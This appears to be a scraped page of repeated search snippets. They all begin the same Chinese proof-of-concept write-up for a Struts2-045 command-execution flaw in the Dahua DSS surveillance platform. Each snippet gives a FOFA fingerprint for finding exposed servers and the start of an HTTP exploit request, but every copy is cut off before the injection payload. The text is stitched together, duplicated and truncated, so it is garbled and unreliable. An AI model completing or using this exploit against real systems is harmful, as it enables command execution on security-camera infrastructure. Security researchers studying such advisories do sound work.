## 大华DSS城市安防监控平台Struct2-045命令执行漏洞 ## fofa ``` app="dahua-DSS" ``` ## poc ``` POST /admin/login_login.action HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML,
登录接口存在Struct2-045漏洞,可执行系统命令并回显。 GET/admin/login_login.actionHTTP/1.1Host:User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423FAccept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8Accept-En...
## 大华DSS城市安防监控平台Struct2-045命令执行漏洞 ## fofa ``` app="dahua-DSS" ``` ## poc ``` POST /admin/login_login.action HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F Content...
## 大华DSS城市安防监控平台Struct2-045命令执行漏洞 ## fofa ``` app="dahua-DSS" ``` ## poc ``` POST /admin/login_login.action HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F Content...
## 大华DSS城市安防监控平台Struct2-045命令执行漏洞 ## fofa ``` app="dahua-DSS" ``` ## poc ``` POST /admin/login_login.action HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F Content...
## 大华DSS城市安防监控平台Struct2-045命令执行漏洞 ## fofa ``` app="dahua-DSS" ``` ## poc ``` POST /admin/login_login.action HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F Content...
## 大华DSS城市安防监控平台Struct2-045命令执行漏洞 ## fofa ``` app="dahua-DSS" ``` ## poc ``` POST /admin/login_login.action HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F Content...
大华DSS城市安防监控平台Struct2-045命令执行漏洞.md +21 Original file line numberDiff line numberDiff line change @@ -0,0 +1,21 @@ 1 + ## 大华DSS城市安防监控平台Struct2-045命令执行漏洞 2 + 3 + 4 + ## fofa 5 + ``` 6 + app="dahua-DSS" 7 + ``` 8 + 9 +...
## 大华DSS城市安防监控平台Struct2-045命令执行漏洞 ## fofa ``` app="dahua-DSS" ``` ## poc ``` POST /admin/login_login.action HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F Content...
## 大华DSS城市安防监控平台Struct2-045命令执行漏洞 ## fofa ``` app="dahua-DSS" ``` ## poc ``` POST /admin/login_login.action HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F Content...